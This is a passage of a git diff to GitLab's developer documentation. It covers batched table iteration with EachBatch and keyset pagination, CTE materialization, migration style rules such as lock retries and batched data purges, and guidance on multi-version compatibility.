to the size of the returned dataset. That happens because when taking +`n` possible values of attributes, one can't tell for sure that the number of records that contains +them will be less than `n`. ## Column definition -`EachBatch` uses the primary key of the model by default for the iteration. This works most of the cases, however in some cases, you might want to use a different column for the iteration. +`EachBatch` uses the primary key of the model by default for the iteration. This works most of the +cases, however in some cases, you might want to use a different column for the iteration. ```ruby Project.distinct.each_batch(column: :creator_id, of: 10) do |relation| @@ -78,27 +83,38 @@ end The query above iterates over the project creators and prints them out without duplications. NOTE: -In case the column is not unique (no unique index definition), calling the `distinct` method on the relation is necessary. Using not unique column without `distinct` may result in `each_batch` falling into endless loop as described at following [issue](https://gitlab.com/gitlab-org/gitlab/-/issues/285097) +In case the column is not unique (no unique index definition), calling the `distinct` method on +the relation is necessary. Using not unique column without `distinct` may result in `each_batch` +falling into an endless loop as described in following +[issue](https://gitlab.com/gitlab-org/gitlab/-/issues/285097). ## `EachBatch` in data migrations -When dealing with data migrations the preferred way to iterate over large volume of data is using `EachBatch`. +When dealing with data migrations the preferred way to iterate over a large volume of data is using +`EachBatch`. A special case of data migration is a [background migration](background_migrations.md#scheduling) -where the actual data modification is executed in a background job. The migration code that determines -the data ranges (slices) and schedules the background jobs uses `each_batch`. +where the actual data modification is executed in a background job. The migration code that +determines the data ranges (slices) and schedules the background jobs uses `each_batch`. ## Efficient usage of `each_batch` -`EachBatch` helps iterating over large tables. It's important to highlight that `EachBatch` is not going to magically solve all iteration related performance problems and it might not help at all in some scenarios. From the database point of view, correctly configured database indexes are also necessary to make `EachBatch` perform well. +`EachBatch` helps to iterate over large tables. It's important to highlight that `EachBatch` is +not going to magically solve all iteration related performance problems and it might not help at +all in some scenarios. From the database point of view, correctly configured database indexes are +also necessary to make `EachBatch` perform well. ### Example 1: Simple iteration -Let's consider that we want to iterate over the `users` table and print the `User` records to the standard output. The `users` table contains millions of records, thus running one query to fetch the users will likely time out. +Let's consider that we want to iterate over the `users` table and print the `User` records to the +standard output. The `users` table contains millions of records, thus running one query to fetch +the users will likely time out.  -This is a simplified version of the `users` table which contains several rows. We have a few smaller gaps in the `id` column to make the example a bit more realistic (a few records were already deleted). Currently we have one index on the `id` field. +This is a simplified version of the `users` table which contains several rows. We have a few +smaller gaps in the `id` column to make the example a bit more realistic (a few records were +already deleted). Currently, we have one index on the `id` field. Loading all users into memory (avoid): @@ -117,9 +133,10 @@ User.each_batch(of: 5) do |relation| end ``` -#### How does `each_batch` work? +#### How `each_batch` works -As the first step, it finds the lowest `id` (start `id`) in the table by executing the following database query: +As the first step, it finds the lowest `id` (start `id`) in the table by executing the following +database query: ```sql SELECT "users"."id" FROM "users" ORDER BY "users"."id" ASC LIMIT 1 @@ -127,9 +144,12 @@ SELECT "users"."id" FROM "users" ORDER BY "users"."id" ASC LIMIT 1  -Notice that the query only reads data from the index (`INDEX ONLY SCAN`), the table is not accessed. Database indexes are sorted so taking out the first item is a very cheap operation. +Notice that the query only reads data from the index (`INDEX ONLY SCAN`), the table is not +accessed. Database indexes are sorted so taking out the first item is a very cheap operation. -The next step is to find the next `id` (end `id`) which should respect the batch size configuration. In this example we used batch size of 5. `EachBatch` uses the `OFFSET` clause to get a "shifted" `id` value. +The next step is to find the next `id` (end `id`) which should respect the batch size +configuration. In this example we used a batch size of 5. `EachBatch` uses the `OFFSET` clause +to get a "shifted" `id` value. ```sql SELECT "users"."id" FROM "users" WHERE "users"."id" >= 1 ORDER BY "users"."id" ASC LIMIT 1 OFFSET 5 @@ -137,19 +157,25 @@ SELECT "users"."id" FROM "users" WHERE "users"."id" >= 1 ORDER BY "users"."id" A  -Again, the query only looks into the index. The `OFFSET 5` takes out the sixth `id` value: this query reads a maximum of six items from the index regardless of the table size or the iteration count. +Again, the query only looks into the index. The `OFFSET 5` takes out the sixth `id` value: this +query reads a maximum of six items from the index regardless of the table size or the iteration +count. -At this point we know the `id` range for the first batch. Now it's time to construct the query for the `relation` block. +At this point, we know the `id` range for the first batch. Now it's time to construct the query +for the `relation` block. ```sql SELECT "users".* FROM "users" WHERE "users"."id" >= 1 AND "users"."id" < 302 ``` - + -Notice the `<` sign. Previously six items were read from the index and in this query the last value is "excluded". The query will look at the index to get the location of the five `user` rows on the disk and read the rows from the table. The returned array is processed in Ruby. +Notice the `<` sign. Previously six items were read from the index and in this query, the last +value is "excluded". The query will look at the index to get the location of the five `user` +rows on the disk and read the rows from the table. The returned array is processed in Ruby. -The first iteration is done. For the next iteration, the last `id` value is reused from the previous iteration in order to find out the next end `id` value. +The first iteration is done. For the next iteration, the last `id` value is reused from the +previous iteration in order to find out the next end `id` value. ```sql SELECT "users"."id" FROM "users" WHERE "users"."id" >= 302 ORDER BY "users"."id" ASC LIMIT 1 OFFSET 5 @@ -167,7 +193,8 @@ SELECT "users".* FROM "users" WHERE "users"."id" >= 302 AND "users"."id" < 353 ### Example 2: Iteration with filters -Building on top of the previous example, we want to print users with zero sign-in count. We keep track of the number of sign-ins in the `sign_in_count` column so we write the following code: +Building on top of the previous example, we want to print users with zero sign-in count. We keep +track of the number of sign-ins in the `sign_in_count` column so we write the following code: ```ruby users = User.where(sign_in_count: 0) @@ -183,7 +210,10 @@ end SELECT "users"."id" FROM "users" WHERE "users"."sign_in_count" = 0 ORDER BY "users"."id" ASC LIMIT 1 ``` -Selecting only the `id` column and ordering by `id` is going to "force" the database to use the index on the `id` (primary key index) column, however we also have an extra condition on the `sign_in_count` column. The column is not part of the index, so the database needs to look into the actual table to find the first matching row. +Selecting only the `id` column and ordering by `id` is going to "force" the database to use the +index on the `id` (primary key index) column however, we also have an extra condition on the +`sign_in_count` column. The column is not part of the index, so the database needs to look into +the actual table to find the first matching row.  @@ -193,7 +223,11 @@ The number of scanned rows depends on the data distribution in the table. - Best case scenario: the first user was never logged in. The database reads only one row. - Worst case scenario: all users were logged in at least once. The database reads all rows. -In this particular example the database had to read 10 rows (regardless of our batch size setting) to determine the first `id` value. In a "real-world" application it's hard to predict whether the filtering is going to cause problems or not. In case of GitLab, verifying the data on a production replica is a good start, but keep in mind that data distribution on GitLab.com can be different from self-managed instances. +In this particular example, the database had to read 10 rows (regardless of our batch size setting) +to determine the first `id` value. In a "real-world" application it's hard to predict whether the +filtering is going to cause problems or not. In the case of GitLab, verifying the data on a +production replica is a good start, but keep in mind that data distribution on GitLab.com can be +different from self-managed instances. #### Improve filtering with `each_batch` @@ -207,21 +241,26 @@ This is how our table and the newly created index looks like:  -This index definition covers the conditions on the `id` and `sign_in_count` columns thus makes the `each_batch` queries very effective (similar to the simple iteration example). +This index definition covers the conditions on the `id` and `sign_in_count` columns thus makes the +`each_batch` queries very effective (similar to the simple iteration example). -It's rare when a user was never signed in so we anticipate small index size. Including only the `id` in the index definition also helps keeping the index size small. +It's rare when a user was never signed in so we a anticipate small index size. Including only the +`id` in the index definition also helps to keep the index size small. ##### Index on columns -Later on we might want to iterate over the table filtering for different `sign_in_count` values, in those cases we cannot use the previously suggested conditional index because the `WHERE` condition does not match with our new filter (`sign_in_count > 10`). +Later on, we might want to iterate over the table filtering for different `sign_in_count` values, in +those cases we cannot use the previously suggested conditional index because the `WHERE` condition +does not match with our new filter (`sign_in_count > 10`). To address this problem, we have two options: - Create another, conditional index to cover the new query. -- Replace the index with more generalized configuration. +- Replace the index with a more generalized configuration. NOTE: -Having multiple indexes on the same table and on the same columns could be a performance bottleneck when writing data. +Having multiple indexes on the same table and on the same columns could be a performance bottleneck +when writing data. Let's consider the following index (avoid): @@ -229,15 +268,18 @@ Let's consider the following index (avoid): CREATE INDEX index_on_users_never_logged_in ON users (id, sign_in_count) ``` -The index definition starts with the `id` column which makes the index very inefficient from data selectivity point of view. +The index definition starts with the `id` column which makes the index very inefficient from data +selectivity point of view. ```sql SELECT "users"."id" FROM "users" WHERE "users"."sign_in_count" = 0 ORDER BY "users"."id" ASC LIMIT 1 ``` -Executing the query above results in an `INDEX ONLY SCAN`. However, the query still needs to iterate over unknown number of entries in the index, and then find the first item where the `sign_in_count` is `0`. +Executing the query above results in an `INDEX ONLY SCAN`. However, the query still needs to +iterate over an unknown number of entries in the index, and then find the first item where the +`sign_in_count` is `0`. - + We can improve the query significantly by swapping the columns in the index definition (prefer). @@ -253,11 +295,14 @@ The following index definition is not going to work well with `each_batch` (avoi CREATE INDEX index_on_users_never_logged_in ON users (sign_in_count) ``` -Since `each_batch` builds range queries based on the `id` column, this index cannot be used efficiently. The DB reads the rows from the table or uses a bitmap search where the primary key index is also read. +Since `each_batch` builds range queries based on the `id` column, this index cannot be used +efficiently. The DB reads the rows from the table or uses a bitmap search where the primary +key index is also read. ##### "Slow" iteration -Slow iteration means that we use a good index configuration to iterate over the table and apply filtering on the yielded relation. +Slow iteration means that we use a good index configuration to iterate over the table and +apply filtering on the yielded relation. ```ruby User.each_batch(of: 5) do |relation| @@ -266,7 +311,8 @@ end ``` The iteration uses the primary key index (on the `id` column) which makes it safe from statement -timeouts. The filter (`sign_in_count: 0`) is applied on the `relation` where the `id` is already constrained (range). The number of rows are limited. +timeouts. The filter (`sign_in_count: 0`) is applied on the `relation` where the `id` is already +constrained (range). The number of rows is limited. Slow iteration generally takes more time to finish. The iteration count is higher and one iteration could yield fewer records than the batch size. Iterations may even yield @@ -285,18 +331,19 @@ projects.each_batch do |relation| end ``` -The iteration uses the `id` column of the `projects` table. The batching does not affect the subquery. -This means for each iteration, the subquery is executed by the database. This adds a constant "load" -on the query which often ends up in statement timeouts. We have an unknown number of confidential -issues, the execution time and the accessed database rows depends on the data distribution in the -`issues` table. +The iteration uses the `id` column of the `projects` table. The batching does not affect the +subquery. This means for each iteration, the subquery is executed by the database. This adds a +constant "load" on the query which often ends up in statement timeouts. We have an unknown number +of confidential issues, the execution time and the accessed database rows depend on the data +distribution in the `issues` table. NOTE: Using subqueries works only when the subquery returns a small number of rows. #### Improving Subqueries -When dealing with subqueries, a slow iteration approach could work: the filter on `creator_id` can be part of the generated `relation` object. +When dealing with subqueries, a slow iteration approach could work: the filter on `creator_id` +can be part of the generated `relation` object. ```ruby projects = Project.all @@ -306,7 +353,8 @@ projects.each_batch do |relation| end ``` -If the query on the `issues` table itself is not performant enough, a nested loop could be constructed. Try to avoid it when possible. +If the query on the `issues` table itself is not performant enough, a nested loop could be +constructed. Try to avoid it when possible. ```ruby projects = Project.all @@ -320,7 +368,8 @@ projects.each_batch do |relation| end ``` -If we know that the `issues` table has many more rows than `projects`, it would make sense to flip the queries, where the `issues` table is batched first. +If we know that the `issues` table has many more rows than `projects`, it would make sense to flip +the queries, where the `issues` table is batched first. ### Using `JOIN` and `EXISTS` @@ -331,7 +380,8 @@ When to use `JOINS`: - `projects` - `project_settings` - `users` - `user_details` - `users` - `user_statuses` -- `LEFT JOIN` works well in this case. Conditions on the joined table need to go to the yielded relation so the iteration is not affected by the data distribution in the joined table. +- `LEFT JOIN` works well in this case. Conditions on the joined table need to go to the yielded +relation so the iteration is not affected by the data distribution in the joined table. Example: @@ -353,7 +403,8 @@ end ### Complex queries on the relation object -When the `relation` object has several extra conditions, the execution plans might become "unstable". +When the `relation` object has several extra conditions, the execution plans might become +"unstable". Example: @@ -370,10 +421,11 @@ end Here, we expect that the `relation` query reads the `BATCH_SIZE` of user records and then filters down the results according to the provided queries. The planner might decide that using a bitmap index lookup with the index on the `confidential` column is a better way to -execute the query. This can cause unexpectedly high amount of rows to be read and the query -could time out. +execute the query. This can cause an unexpectedly high amount of rows to be read and the +query could time out. -Problem: we know for sure that the relation is returning maximum `BATCH_SIZE` of records, however the planner does not know this. +Problem: we know for sure that the relation is returning maximum `BATCH_SIZE` of records +however, the planner does not know this. Common table expression (CTE) trick to force the range query to execute first: @@ -394,4 +446,132 @@ end ### `EachBatch` vs `BatchCount` -When adding new counters for usage ping, the preferred way to count records is using the `Gitlab::Database::BatchCount` class. The iteration logic implemented in `BatchCount` has similar performance characteristics like `EachBatch`. Most of the tips and suggestions for improving `BatchCount` mentioned above applies to `BatchCount` as well. +When adding new counters for Service Ping, the preferred way to count records is using the +`Gitlab::Database::BatchCount` class. The iteration logic implemented in `BatchCount` +has similar performance characteristics like `EachBatch`. Most of the tips and suggestions +for improving `BatchCount` mentioned above applies to `BatchCount` as well. + +## Iterate with keyset pagination + +There are a few special cases where iterating with `EachBatch` does not work. `EachBatch` +requires one distinct column (usually the primary key), which makes the iteration impossible +for timestamp columns and tables with composite primary keys. + +Where `EachBatch` does not work, you can use +[keyset pagination](database/pagination_guidelines.md#keyset-pagination) to iterate over the +table or a range of rows. The scaling and performance characteristics are very similar to +`EachBatch`. + +Examples: + +- Iterate over the table in a specific order (timestamp columns) in combination with a tie-breaker +if column user to sort by does not contain unique values. +- Iterate over the table with composite primary keys. + +### Iterate over the issues in a project by creation date + +You can use keyset pagination to iterate over any database column in a specific order (for example, +`created_at DESC`). To ensure consistent order of the returned records with the same values for +`created_at`, use a tie-breaker column with unique values (for example, `id`). + +Assume you have the following index in the `issues` table: + +```sql +idx_issues_on_project_id_and_created_at_and_id" btree (project_id, created_at, id) +``` + +### Fetching records for further processing + +The following snippet iterates over issue records within the project using the specified order +(`created_at, id`). + +```ruby +scope = Issue.where(project_id: 278964).order(:created_at, :id) # id is the tie-breaker + +iterator = Gitlab::Pagination::Keyset::Iterator.new(scope: scope) + +iterator.each_batch(of: 100) do |records| + puts records.map(&:id) +end +``` + +You can add extra filters to the query. This example only lists the issue IDs created in the last +30 days: + +```ruby +scope = Issue.where(project_id: 278964).where('created_at > ?', 30.days.ago).order(:created_at, :id) # id is the tie-breaker + +iterator = Gitlab::Pagination::Keyset::Iterator.new(scope: scope) + +iterator.each_batch(of: 100) do |records| + puts records.map(&:id) +end +``` + +### Updating records in the batch + +For complex `ActiveRecord` queries, the `.update_all` method does not work well, because it +generates an incorrect `UPDATE` statement. +You can use raw SQL for updating records in batches: + +```ruby +scope = Issue.where(project_id: 278964).order(:created_at, :id) # id is the tie-breaker + +iterator = Gitlab::Pagination::Keyset::Iterator.new(scope: scope) + +iterator.each_batch(of: 100) do |records| + ApplicationRecord.connection.execute("UPDATE issues SET updated_at=NOW() WHERE issues.id in (#{records.dup.reselect(:id).to_sql})") +end +``` + +NOTE: +To keep the iteration stable and predictable, avoid updating the columns in the `ORDER BY` clause. + +### Iterate over the `merge_request_diff_commits` table + +The `merge_request_diff_commits` table uses a composite primary key (`merge_request_diff_id, +relative_order`), which makes `EachBatch` impossible to use efficiently. + +To paginate over the `merge_request_diff_commits` table, you can use the following snippet: + +```ruby +# Custom order object configuration: +order = Gitlab::Pagination::Keyset::Order.build([ + Gitlab::Pagination::Keyset::ColumnOrderDefinition.new( + attribute_name: 'merge_request_diff_id', + order_expression: MergeRequestDiffCommit.arel_table[:merge_request_diff_id].asc, + nullable: :not_nullable, + distinct: false, + ), + Gitlab::Pagination::Keyset::ColumnOrderDefinition.new( + attribute_name: 'relative_order', + order_expression: MergeRequestDiffCommit.arel_table[:relative_order].asc, + nullable: :not_nullable, + distinct: false, + ) +]) +MergeRequestDiffCommit.include(FromUnion) # keyset pagination generates UNION queries + +scope = MergeRequestDiffCommit.order(order) + +iterator = Gitlab::Pagination::Keyset::Iterator.new(scope: scope) + +iterator.each_batch(of: 100) do |records| + puts records.map { |record| [record.merge_request_diff_id, record.relative_order] }.inspect +end +``` + +### Order object configuration + +Keyset pagination works well with simple `ActiveRecord` `order` scopes +([first example](iterating_tables_in_batches.md#iterate-over-the-issues-in-a-project-by-creation-date). +However, in special cases, you need to describe the columns in the `ORDER BY` clause (second example) +for the underlying keyset pagination library. When the `ORDER BY` configuration cannot be +automatically determined by the keyset pagination library, an error is raised. + +The code comments of the +[`Gitlab::Pagination::Keyset::Order`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/pagination/keyset/order.rb) +and [`Gitlab::Pagination::Keyset::ColumnOrderDefinition`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/pagination/keyset/column_order_definition.rb) +classes give an overview of the possible options for configuring the `ORDER BY` clause. You can +also find a few code examples in the +[keyset pagination](database/keyset_pagination.md#complex-order-configuration) documentation. diff --git a/doc/development/jh_features_review.md b/doc/development/jh_features_review.md index b139a380344..cb0f8ddbd13 100644 --- a/doc/development/jh_features_review.md +++ b/doc/development/jh_features_review.md @@ -29,11 +29,14 @@ See the [merge request process](https://about.gitlab.com/handbook/ceo/chief-of-s on the JiHu Support handbook. This page is the single source of truth for JiHu-related processes. -## Act as EE when `jh/` does not exist +## Act as EE when `jh/` does not exist or when `EE_ONLY=1` - In the case of EE repository, `jh/` does not exist so it should just act like EE (or CE when the license is absent) - In the case of JH repository, `jh/` does exist but `EE_ONLY` environment variable can be set to force it run under EE mode. -- In the case of JH repository, `jh/` does exist but `FOSS_ONLY` environment variable can be set to force it run under CE mode. + +## Act as FOSS when `FOSS_ONLY=1` + +- In the case of JH repository, `jh/` does exist but `FOSS_ONLY` environment variable can be set to force it run under FOSS (CE) mode. ## CI pipelines in a JH context diff --git a/doc/development/logging.md b/doc/development/logging.md index 45f5b672365..cb1070b49cc 100644 --- a/doc/development/logging.md +++ b/doc/development/logging.md @@ -58,12 +58,12 @@ Structured logging solves these problems. Consider the example from an API reque In a single line, we've included all the information that a user needs to understand what happened: the timestamp, HTTP method and path, user -ID, etc. +ID, and so on. ### How to use JSON logging Suppose you want to log the events that happen in a project -importer. You want to log issues created, merge requests, etc. as the +importer. You want to log issues created, merge requests, and so on, as the importer progresses. Here's what to do: 1. Look at [the list of GitLab Logs](../administration/logs.md) to see @@ -174,7 +174,7 @@ Resources: Similar to timezones, choosing the right time unit to log can impose avoidable overhead. So, whenever challenged to choose between seconds, milliseconds or any other unit, lean towards _seconds_ as float -(with microseconds precision, i.e. `Gitlab::InstrumentationHelper::DURATION_PRECISION`). +(with microseconds precision, that is, `Gitlab::InstrumentationHelper::DURATION_PRECISION`). In order to make it easier to track timings in the logs, make sure the log key has `_s` as suffix and `duration` within its name (for example, `view_duration_s`). diff --git a/doc/development/merge_request_performance_guidelines.md b/doc/development/merge_request_performance_guidelines.md index 973d4042cda..d87b7bcb5af 100644 --- a/doc/development/merge_request_performance_guidelines.md +++ b/doc/development/merge_request_performance_guidelines.md @@ -179,9 +179,9 @@ As a counterpart of the `without_sticky_writes` utility, replicas regardless of the current primary stickiness. This utility is reserved for cases where queries can tolerate replication lag. -Internally, our database load balancer classifies the queries based on their main statement (`select`, `update`, `delete`, etc.). When in doubt, it redirects the queries to the primary database. Hence, there are some common cases the load balancer sends the queries to the primary unnecessarily: +Internally, our database load balancer classifies the queries based on their main statement (`select`, `update`, `delete`, and so on). When in doubt, it redirects the queries to the primary database. Hence, there are some common cases the load balancer sends the queries to the primary unnecessarily: -- Custom queries (via `exec_query`, `execute_statement`, `execute`, etc.) +- Custom queries (via `exec_query`, `execute_statement`, `execute`, and so on) - Read-only transactions - In-flight connection configuration set - Sidekiq background jobs @@ -197,7 +197,18 @@ costly, time-consuming query to the replicas. Read about [complex queries on the relation object](iterating_tables_in_batches.md#complex-queries-on-the-relation-object) for considerations on how to use CTEs. We have found in some situations that CTEs can become problematic in use (similar to the n+1 problem above). In particular, hierarchical recursive CTE queries such as the CTE in [AuthorizedProjectsWorker](https://gitlab.com/gitlab-org/gitlab/-/issues/325688) are very difficult to optimize and don't scale. We should avoid them when implementing new features that require any kind of hierarchical structure. -However, in many simpler cases, such as this [example](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/43242#note_61416277), CTEs can be quite effective as an optimization fence. +CTEs have been effectively used as an optimization fence in many simpler cases, +such as this [example](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/43242#note_61416277). +Beginning in PostgreSQL 12, CTEs are inlined then [optimized by default](https://paquier.xyz/postgresql-2/postgres-12-with-materialize/). +Keeping the old behavior requires marking CTEs with the keyword `MATERIALIZED`. + +When building CTE statements, use the `Gitlab::SQL::CTE` class [introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/56976) in GitLab 13.11. +By default, this `Gitlab::SQL::CTE` class forces materialization through adding the `MATERIALIZED` keyword for PostgreSQL 12 and higher. +`Gitlab::SQL::CTE` automatically omits materialization when PostgreSQL 11 is running +(this behavior is implemented using a custom arel node `Gitlab::Database::AsWithMaterialized` under the surface). + +WARNING: +We plan to drop the support for PostgreSQL 11. Upgrading to GitLab 14.0 requires PostgreSQL 12 or higher. ## Cached Queries @@ -556,7 +567,7 @@ to work with you to possibly discover a better solution. The usage of local storage is a desired solution to use, especially since we work on deploying applications to Kubernetes clusters. When you would like to use `Dir.mktmpdir`? In a case when you want for example -to extract/create archives, perform extensive manipulation of existing data, etc. +to extract/create archives, perform extensive manipulation of existing data, and so on. ```ruby Dir.mktmpdir('designs') do |path| diff --git a/doc/development/migration_style_guide.md b/doc/development/migration_style_guide.md index 009ead8ba16..f76b053c2bd 100644 --- a/doc/development/migration_style_guide.md +++ b/doc/development/migration_style_guide.md @@ -19,8 +19,8 @@ Migrations are **not** allowed to require GitLab installations to be taken offline ever. Migrations always must be written in such a way to avoid downtime. In the past we had a process for defining migrations that allowed for downtime by setting a `DOWNTIME` constant. You may see this when looking at -older migrations. This process was in place for 4 years without every being -used and as such we've learnt we can always figure out how to write a migration +older migrations. This process was in place for 4 years without ever being +used and as such we've learned we can always figure out how to write a migration differently to avoid downtime. When writing your migrations, also consider that databases might have stale data @@ -35,10 +35,21 @@ For GitLab.com, please take into consideration that regular migrations (under `d are run before [Canary is deployed](https://gitlab.com/gitlab-com/gl-infra/readiness/-/tree/master/library/canary/#configuration-and-deployment), and [post-deployment migrations](post_deployment_migrations.md) (`db/post_migrate`) are run after the deployment to production has finished. +## Create database migrations + +To create a migration you can use the following Rails generator: + +```shell +bundle exec rails g migration migration_name_here +``` + +This generates the migration file in `db/migrate`. + ## Schema Changes Changes to the schema should be committed to `db/structure.sql`. This -file is automatically generated by Rails, so you normally should not +file is automatically generated by Rails when you run +`bundle exec rails db:migrate`, so you normally should not edit this file by hand. If your migration is adding a column to a table, that column is added at the bottom. Please do not reorder columns manually for existing tables as this causes confusion to @@ -205,6 +216,30 @@ def down end ``` +**Multiple changes on the same table:** + +The helper `with_lock_retries` wraps all operations into a single transaction. When you have the lock, +you should do as much as possible inside the transaction rather than trying to get another lock later. +Be careful about running long database statements within the block. The acquired locks are kept until the transaction (block) finishes and depending on the lock type, it might block other database operations. + +```ruby +include Gitlab::Database::MigrationHelpers + +def up + with_lock_retries do + add_column :users, :full_name, :string + add_column :users, :bio, :string + end +end + +def down + with_lock_retries do + remove_column :users, :full_name + remove_column :users, :bio + end +end +``` + **Removing a foreign key:** ```ruby @@ -264,6 +299,8 @@ end **Creating a new table when we have two foreign keys:** +Only one foreign key should be created per migration. This is because [the addition of a foreign key constraint requires a `SHARE ROW EXCLUSIVE` lock on the referenced table](https://www.postgresql.org/docs/12/sql-createtable.html#:~:text=The%20addition%20of%20a%20foreign%20key%20constraint%20requires%20a%20SHARE%20ROW%20EXCLUSIVE%20lock%20on%20the%20referenced%20table), and locking multiple tables in the same transaction should be avoided. + For this, we need three migrations: 1. Creating the table without foreign keys (with the indices). @@ -570,7 +607,7 @@ perform existence checks internally. When adding a foreign-key constraint to either an existing or a new column also remember to add an index on the column. -This is **required** for all foreign-keys, e.g., to support efficient cascading +This is **required** for all foreign-keys, for example, to support efficient cascading deleting: when a lot of rows in a table get deleted, the referenced records need to be deleted too. The database has to look for corresponding records in the referenced table. Without an index, this results in a sequential scan on the @@ -943,6 +980,41 @@ derived from the class name or namespace. Be aware of the limitations [when using models in migrations](#using-models-in-migrations-discouraged). +### Modifying existing data + +In most circumstances, prefer migrating data in **batches** when modifying data in the database. + +We introduced a new helper [each_batch_range](https://gitlab.com/gitlab-org/gitlab/-/blob/cd3e0a5cddcb464cb9b8c6e3275839cf57dfa6e2/lib/gitlab/database/dynamic_model_helpers.rb#L28-32) which facilitates the process of iterating over a collection in a performant way. The default size of the batch is defined in the `BATCH_SIZE` constant. + +See the following example to get an idea. + +**Purging data in batch:** + +```ruby +include ::Gitlab::Database::DynamicModelHelpers + +disable_ddl_transaction! + +def up + each_batch_range('ci_pending_builds', scope: ->(table) { table.ref_protected }, of: BATCH_SIZE) do |min, max| + execute <<~SQL + DELETE FROM ci_pending_builds + USING ci_builds + WHERE ci_builds.id = ci_pending_builds.build_id + AND ci_builds.status != 'pending' + AND ci_builds.type = 'Ci::Build' + AND ci_pending_builds.id BETWEEN #{min} AND #{max} + SQL + end +end +``` + +- The first argument is the table being modified: `'ci_pending_builds'`. +- The second argument calls a lambda which fetches the relevant dataset selected (the default is set to `.all`): `scope: ->(table) { table.ref_protected }`. +- The third argument is the batch size (the default is set in the `BATCH_SIZE` constant): `of: BATCH_SIZE`. + +Here is an [example MR](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/62195) illustrating how to use our new helper. + ### Renaming reserved paths When a new route for projects is introduced, it could conflict with any diff --git a/doc/development/module_with_instance_variables.md b/doc/development/module_with_instance_variables.md index f298b603429..0f910f20534 100644 --- a/doc/development/module_with_instance_variables.md +++ b/doc/development/module_with_instance_variables.md @@ -49,9 +49,9 @@ instance variables in the final giant object, and that's where the problem is. ## Solutions We should split the giant object into multiple objects, and they communicate -with each other with the API, i.e. public methods. In short, composition over +with each other with the API, that is, public methods. In short, composition over inheritance. This way, each smaller objects would have their own respective -limited states, i.e. instance variables. If one instance variable goes wrong, +limited states, that is, instance variables. If one instance variable goes wrong, we would be very clear that it's from that single small object, because no one else could be touching it. diff --git a/doc/development/multi_version_compatibility.md b/doc/development/multi_version_compatibility.md index acdf8194cb1..3314b5e7ddc 100644 --- a/doc/development/multi_version_compatibility.md +++ b/doc/development/multi_version_compatibility.md @@ -43,6 +43,10 @@ Is it ok if all GitLab nodes have been updated, but the post-deployment migratio Is it ok if all nodes have been updated, and then the post-deployment migrations get executed a couple days later, and then the background migrations take a week to finish? +### When upgrading a dependency like Rails + +Is it ok that some nodes have the new Rails version, but some nodes have the old Rails version? + ## A walkthrough of an update Backwards compatibility problems during updates are often very subtle. This is why it is worth familiarizing yourself with [update instructions](../update/index.md), [reference architectures](../administration/reference_architectures/index.md), and [GitLab.com's architecture](https://about.gitlab.com/handbook/engineering/infrastructure/production/architecture/). But to illustrate how these problems arise, take a look at this example of a simple update. @@ -102,14 +106,33 @@ Yes! We have specific instructions for [zero-downtime updates](../update/index.m ## I've identified a potential backwards compatibility problem, what can I do about it? +### Coordinate + +For major or minor version updates of Rails or Puma: + +- Engage the Quality team to thoroughly test the MR. +- Notify the `@gitlab-org/release/managers` on the MR prior to merging. + ### Feature flags -One way to handle this is to use a feature flag that is disabled by -default. The feature flag can be enabled when the deployment is in a -consistent state. However, this method of synchronization **does not -guarantee** that customers with on-premise instances can [update with -zero downtime](https://docs.gitlab.com/omnibus/update/#zero-downtime-updates) -because point releases bundle many changes together. +[Feature flags](feature_flags/index.md) are a tool, not a strategy, for handling backward compatibility problems. + +For example, it is safe to add a new feature with frontend and API changes, if both +frontend and API changes are disabled by default. This can be done with multiple +merge requests, merged in any order. After all the changes are deployed to +GitLab.com, the feature can be enabled in ChatOps and validated on GitLab.com. + +**However, it is not necessarily safe to enable the feature by default.** If the +feature flag is removed, or the default is flipped to enabled, in the same release +where the code was merged, then customers performing [zero-downtime updates](https://docs.gitlab.com/omnibus/update/#zero-downtime-updates) +will end up running the new frontend code against the previous release's API. + +If you're not sure whether it's safe to enable all the changes at once, then one +option is to enable the API in the **current** release and enable the frontend +change in the **next** release. This is an example of the [Expand and contract pattern](#expand-and-contract-pattern). + +Or you may be able to avoid delaying by a release by modifying the frontend to +[degrade gracefully](#graceful-degradation) against the previous release's API. ### Graceful degradation @@ -281,7 +304,7 @@ variable `CI_NODE_TOTAL` being an integer failed. This was caused because after 1. As a result, the [new code](https://gitlab.com/gitlab-org/gitlab/-/blob/42b82a9a3ac5a96f9152aad6cbc583c42b9fb082/app/models/concerns/ci/contextable.rb#L104) was not run on the API server. The runner's request failed because the older API server tried return the `CI_NODE_TOTAL` CI/CD variable, but -instead of sending an integer value (e.g. 9), it sent a serialized +instead of sending an integer value (for example, 9), it sent a serialized `Hash` value (`{:number=>9, :total=>9}`). If you look at the [deployment pipeline](https://ops.gitlab.net/gitlab-com/gl-infra/deployer/-/pipelines/202212), diff --git a/doc/development/new_fe_guide/dependencies.md b/doc/development/new_fe_guide/dependencies.md deleted file mode 100644 index c8bc1b70aa9..00000000000 --- a/doc/development/new_fe_guide/dependencies.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: '../fe_guide/dependencies.md' -remove_date: '2021-05-14' ---- - -This document was moved to [another location](../fe_guide/dependencies.md). - -<!-- This redirect file can be deleted after <2021-05-14>. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/development/omnibus.md b/doc/development/omnibus.md index 5b97221bd29..dc83b0ea257 100644 --- a/doc/development/omnibus.md +++ b/doc/development/omnibus.md @@ -12,7 +12,7 @@ when you are coding. ## Files are owned by root by default -All the files in the Rails tree (`app/`, `config/` etc.) are owned by `root` in +All the files in the Rails tree (`app/`, `config/`, and so on) are owned by `root` in Omnibus installations. This makes the installation simpler and it provides extra security. The Omnibus reconfigure script contains commands that give write access to the `git` user only where needed. diff --git a/doc/development/packages.md b/doc/development/packages.md index 294cc528ad1..94882cefc30 100644 --- a/doc/development/packages.md +++ b/doc/development/packages.md @@ -133,7 +133,7 @@ During this phase, the idea is to collect as much information as possible about - **Authentication**: What authentication mechanisms are available (OAuth, Basic Authorization, other). Keep in mind that GitLab users often want to use their [Personal Access Tokens](../user/profile/personal_access_tokens.md). - Although not needed for the MVC first iteration, the [CI/CD job tokens](../api/README.md#gitlab-cicd-job-token) + Although not needed for the MVC first iteration, the [CI/CD job 